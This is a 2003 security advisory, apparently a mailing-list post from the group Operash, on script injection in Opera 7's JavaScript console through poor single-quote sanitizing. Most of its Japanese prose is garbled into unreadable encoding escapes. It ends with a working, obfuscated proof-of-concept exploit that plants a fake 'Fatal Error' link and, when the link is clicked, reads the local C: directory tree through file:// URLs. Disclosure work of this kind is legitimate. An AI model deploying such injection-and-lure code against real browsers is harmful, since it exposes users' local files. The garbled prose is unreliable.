$B3'$5$s$3$s$K$A$O!#(B
$B;d$?$A$O$3$3$K(BOpera$B$N@H<e@-$K$D$$$F$N>pJs$r8x3+$7$^$9!#(B

_________________________________________________

------------------------------------------------------------------------
------
$BMWLs!!!!!!!!(B: [Opera 7] JavaScript$B%3%s%=!<%k$K$*$1$kG$0U$N%9%/%j%W%HA^F~$K$h$k@H<e@-(B
$B!!!!!!!!!!!!(B $B!A(B Yet another story of "Phantom of the Opera" $B!A(B
$B@=IJ!!!!!!!!(B: Opera for Windows
$B%P!<%8%g%s!!(B: 7.10 build 2840
$B!!!!!!!!!!!!(B 7.03 build 2670
$B!!!!!!!!!!!!(B 7.02 build 2668
$B!!!!!!!!!!!!(B 7.02 bork build 2656b
$B!!!!!!!!!!!!(B 7.01 build 2651
$B%Y%s%@!<!!!!(B: Opera Software ASA (http://www.opera.com/)
$B4m81EY!!!!!!(B: $BCfDxEY!#Cm0U$,I,MW!#(B
$B!!!!!!!!!!!!(B $B%m!<%+%k%G%#%9%/>e$N%G!<%?$NO31L!#(B
$BH/8+<T!!!!!!(B: :: Operash :: (nesumin)
$BJs9pF|!!!!!!(B: 2003-04-25
$B8x3+F|!!!!!!(B: 2003-04-28
$B%*%j%8%J%k!!(B: http://opera.rainyblue.org/adv/opera04-jsxss.php
------------------------------------------------------------------------
-------

0. $B@=IJ>pJs(B

Windows$BHG(B Opera $B$O(BGUI$B%Y!<%9$N(BWEB$B%V%i%&%6!<$G$9!#(B
Opera Software ASA (http://www.opera.com/)

1. $B35MW(B

Opera 7 $B$N!V(BJavaScript$B%3%s%=!<%k!W$K$O!"(B
$BI=<($5$l$k%j%s%/$KG$0U$N%9%/%j%W%H$rA^F~$G$-$k@H<e@-$,B8:_$7$^$9!#(B

$B967b<T$O!"$3$N@H<e@-$rMxMQ$7$?0-0U$N$"$k%Z!<%8$rFI$_9~$^$;$k$3$H$G!"%
(%i!<(B
$B%a%C%;!<%8$r:Y9)$7$F!V(BJavaScript$B%3%s%=!<%k!W>e$K!"%m!<%+%k%>!<%
s(B(file://)$B$G(B
$B<B9T$5$l$kG$0U$N%9%/%j%W%H$r4^$s$@%j%s%/$r:n@.$9$k$3$H$,2DG=$G$9!#(B

$B$3$l$K$h$j!"%m!<%+%k%G%#%9%/>e$N%G!<%?$G$"$k%G%#%l%/%H%j9=B$$d%U%!%$%
k$NFbMFEy$N(B
$B>pJs$rFI$_<h$i$l!"$=$l$i$,30It$KO31L$9$kHo32$r<u$1$k4m81@-$,$"$j$^$9!
#(B

2. $B1F6A$r<u$1$k%7%9%F%`(B

Opera 7.10 build 2840
Opera 7.03 build 2670
Opera 7.02 build 2668
Opera 7.02 bork build 2656b
Opera 7.01 build 2651

3. $B1F6A$r<u$1$J$$%7%9%F%`(B

----

4. $B@H<e@-$N3NG'$K;HMQ$7$?4D6-(B

Opera Windows$BHG(B ($B1Q8lHG!&F|K\8lHG(B)
Opera 7.10 build 2840
Opera 7.03 build 2670
Opera 7.02 build 2668
Opera 7.02 bork build 2656b
Opera 7.01 build 2651

$B%W%i%C%H%U%)!<%`(B
Windows 98SE $BF|K\8lHG(B
Windows 2000 Pro SP3 $BF|K\8lHG(B

5. $B%Y%s%@!<$NBP1~(B

$BJs9p:Q$_!#(B(2003/04/25)

6. $B2sHrJ}K!(B

JavaScript$B5!G=$r%*%U$K$9$k!#(B

7. $B>\:Y(B

$B$3$N@H<e@-$O(B Opera 7 $B$N(B console.html $BFb$N%9%/%j%W%H$K$*$$$F!"(B
$B%7%s%0%k%/%)!<%H$N%5%K%?%$%8%s%0$,IT==J,$G$"$k$3$H$,860x$G5/$3$j$^$9!
#(B
$B!V(Bhttp://');alert(location.href+'$B!W$N$h$&$J!V(B'$B!W$r4^$`%(%
i!<%a%C%;!<%8$rH/@8$5$;$k$3$H$G!"(B
$B0J2<$N$h$&$K!"%j%s%/$KG$0U$N%9%/%j%W%H$rA^F~$5$l$k4m81@-$,$"$j$^$9!#
(B

var message = "http://');alert(location.href+'";
opera.postError( message );
location.href = "file://localhost/console.html";

>> $B=PNO7k2L!'(B

<a href="javascript:opera.openInSourceViewer('http://');alert(location.href
+'')">$B!A!A!A(B</a>

$B$^$?!"(BOpera 7.10 $B$G$O!V(B'$B!W$H!V(B'$B!W$r:o=|$9$k=$@5$,$5$l$F$$$^$9$,!"(B
$B$3$N$h$&$J=$@5$@$1$G$OIT==J,$G$"$j!"Ev@H<e@-$rKI$0$3$H$O$G$-$^$;$s!#
(B
$B2<5-$N$h$&$K!V(B'$B!W$NBe$o$j$K!V(B'$B!W$J$I$rMxMQ$5$l$l$P!"F
1MM$K(B
$BG$0U$N%9%/%j%W%H$NA^F~$,2DG=$H$J$j$^$9!#(B

var message = "http://');alert(location.href+'";
opera.postError( message );
location.href = "file://localhost/console.html";

$B$3$N@H<e@-$K$h$jMxMQ<T$,Ev3:%j%s%/$r3+$/$H!V(Bfile://localhost/conso
le.html$B!W$G(B
$B%9%/%j%W%H$,<B9T$5$l!"%m!<%+%k%G%#%9%/>e$N%G%#%l%/%H%j9=B$$d%U%!%$%k$
,FI$_$H$i$l$k(B
$B4m81@-$,$"$j$^$9!#(B

$BEv@H<e@-$O!"(BGreyMagic Software$B$K$h$C$F(B 2003-01-29 $B$K8xI=$5$l$?@H<e@-(B

GreyMagic Software - Phantom of the Opera (GM#003-OP)
http://security.greymagic.com/adv/gm003-op/

$B$K4XO"$7$F$$$^$9!#(B
$B>e5-@H<e@-$O!V(B"$B!W!J%@%V%k%/%)!<%H!K$N%5%K%?%$%8%s%0$K5/0x$7$^$9
$,!"(B
$BEv@H<e@-$OF10l2U=j$N!V(B'$B!W!J%7%s%0%k%/%)!<%H!K$N%5%K%?%$%8%s%0$K
5/0x$7$^$9!#(B

GreyMagic Software $B$K$h$C$F%@%V%k%/%)!<%H$NLdBj$rJs9p$5$l$?;~E@$G!"(B
$BEvA3%7%s%0%k%/%)!<%H$NLdBj$bD4::$9$k$Y$-$G$7$?$,!"$=$l$rBU$C$?%Y%s%@!
<$N(B
$B%;%-%e%j%F%#!<$KBP$9$kG'<1$N4E$5$,!"$3$NLdBj$r8=:_$^$G;D$9;v$K$J$C$?M
W0x$@$H(B
$B9M$($^$9!#(B

8. $B%5%s%W%k%3!<%I(B

$B!~(B $B%5%s%W%k(B Exploit $B%=!<%9%3!<%I(B

[1] $B!V(BXploit$B!W$r!V(Bscript$B!W$KCV$-49$($F!"(BHTML$B%U%!%$%k$H$
7$F(BWEB$B%5!<%P!<$KCV$/(B
[2] Opera$B$G$=$N%Z!<%8$r3+$/(B
[3] JavaScript$B%3%s%=!<%k>e$K:n@.$5$l$?%j%s%/$r3+$/(B

----------------------------------------------------------------
<Xploit>
// c:\ $B0J2<$N%G%#%l%/%H%j>pJs$r;XDj$7$??<$5$^$GFI$_<h$j$^$9!#(B

var depth = 1;
var startdir = "file://localhost/c:/";

// arbitrary script
var evil_script="";
evil_script += "function dt(dp){\n";
evil_script += "var i,j,tr,td,b;\n";
evil_script += "if('complete'==fr.document.readyState&&";
evil_script += "fr.document.getElementsByTagName('base').item(0)){\n";
evil_script += "tr=fr.document.getElementsByTagName('tr');\nb='<hr>\\n'";
evil_script += "+fr.document.getElementsByTagName('base').item(0).href;\n";
evil_script += "b+='<br>\\n'+'Count : '+tr.length+'<br>\\n';\n";
evil_script += "for(i=1;i<tr.length;++i){\n";
evil_script += "td = tr.item(i).getElementsByTagName('td');\n";
evil_script += "if (td.item(0).innerText.match(/^\\.\\.?$/))continue;\n";
evil_script += "if(dp>0 && td.item(0).getElementsByTagName('img')";
evil_script += ".item(0).src.match(/\\\\folder\\.gif$/))\n";
evil_script += "ds.push(td.item(0).getElementsByTagName('a').item(0).href);\n";
evil_script += "for (j=0;j<4;++j)b+=td.item(j).innerText+' ';";
evil_script += "b+='<br>\\n';}tree.innerHTML+=b;\n";
evil_script += "if (0>=ds.length)return;fr.location.href=ds.pop();--dp;}\n";
evil_script += "setTimeout('dt('+dp+');',30);}\nvar ds = new Array(),";
evil_script += "b = document.getElementsByTagName('body').item(0),";
evil_script += "f = document.createElement('iframe'),";
evil_script += "d = document.createElement('div');\n";
evil_script += "d.setAttribute('id','tree');b.appendChild(d);\n";
evil_script += "f.style.width=f.style.height=f.style.border=0;\n";
evil_script += "f.setAttribute('src','"+startdir+"');\n";
evil_script += "f.setAttribute('id','fr');\n";
evil_script += "b.appendChild(f);\n";
evil_script += "dt("+depth+");\n";

// xor and URLEncode
evil_script = escape(evil_script.replace(/./g,function(s){
return(String.fromCharCode(0x80^s.charCodeAt(0)))}));

var msg = "http://";

// fake url
msg += "www.foohoge.bar/abcdefg?summary=fatal%20error&type=unknown&content=%90%
12%38%79%80m";

// code
msg += "');m='";
msg += evil_script;
msg += "';eval(unescape(m).replace(/./g,function(s){";
msg += "return(String.fromCharCode(0x80^s.charCodeAt(0)))})+'\n";

// fake message
msg += "\n";
msg += "Fatal Error !!!!\n\n";
msg += " Please click above link.\n";

opera.postError(msg);
//window.open("file://localhost/console.html","","");
location.href = "file://localhost/console.html";

</Xploit>
----------------------------------------------------------------

$B8!>ZL\E*0J30!"$^$?<+?H$N=jM-J*5Z$S!"$=$l$K=`$:$kJ*0J30$G$N;HMQ$r6X$8$
^$9!#(B
$B$3$N%5%s%W%k$rMxMQ$7$?7k2L!"G!2?$J$kB;32$,@8$8$F$b!"(B:: Operash :: $B5Z$S!"(B
$B$=$N4X78<T$O0l@Z$N@U$rIi$$$^$;$s!#(B

9. $B$3$N>pJs$N<h$j07$$$K$D$$$F(B

$B!&Ev>pJs$O!"$=$NFbMF$,J]>Z$5$l$F$$$k$b$N$G$O$"$j$^$;$s!#(B
$B!!$^$?!"E,59=$@5$5$l$k>l9g$,$"$j$^$9!#(B
$B!&Ev>pJs$K$h$C$FH/@8$7$?$$$+$J$kB;32$b!"(B:: Operash :: $B5Z$S!"$=$N4X78<T$O(B
$B!!0l@Z$N@U$rIi$$$^$;$s!#(B
$B!&$3$NJ8>O$NCx:n8"$O(B :: Operash :: $B5Z$S!"$=$N4X78<T$,J]M-$7$F$$$^$9!#(B

$B!&Ev>pJs$O!"0J2<$NA4$F$N>r7o$rK~$?$9>l9g$K1w$$$F$N$_!"Cx:n8"<T$N5vBzL
5$7$K(B
$B!!E>:\!"MWLs$N7G:\Ey$r9T$C$F$h$$$b$N$H$7$^$9!#(B

$B#1!K>pJs$N0l<!H/?.85$H$7$F!"(B
$B!!!!(B:: Operash :: $B$N%H%C%W%Z!<%8(B (http://opera.rainyblue.org/) $B$+!"(B
$B!!!!$^$?$OEv>pJs$N%*%j%8%J%k(B ($BEvEj9F$N>eIt$K(BURL$B$r5-:\(B)$B$X$N(B
$B!!!!%j%s%/$rD%$k$+!"$^$?$O$=$N(BURL$B$rL@5-$9$k!#(B
$B#2!KEv>pJs$NFbMF$rOD6J$7$F7G:\$7$J$$!#(B
$B#3!K7G:\>l=j$,%$%s%?!<%M%C%H>e$NG^BN$G$"$k$3$H!#(B

$B!&>e5-0J30$N>l9g$O!"I,$:EvJ}$X$*Ld$$9g$o$;$/$@$5$$!#(B

10. $BO"Mm@h!"$=$NB>(B

:: Operash :: http://opera.rainyblue.org/
imagine <imagine20xx (at) gmx (dot) net [email concealed]> (Operash Webmaster)
nesumin <nesumin (at) softhome (dot) net [email concealed]>

$B6(NO(B ($B7I>NN,(B)

melorin
piso(sexy)

_________________________________________________

-------
nesumin <nesumin (at) softhome (dot) net [email concealed]>

[ reply ]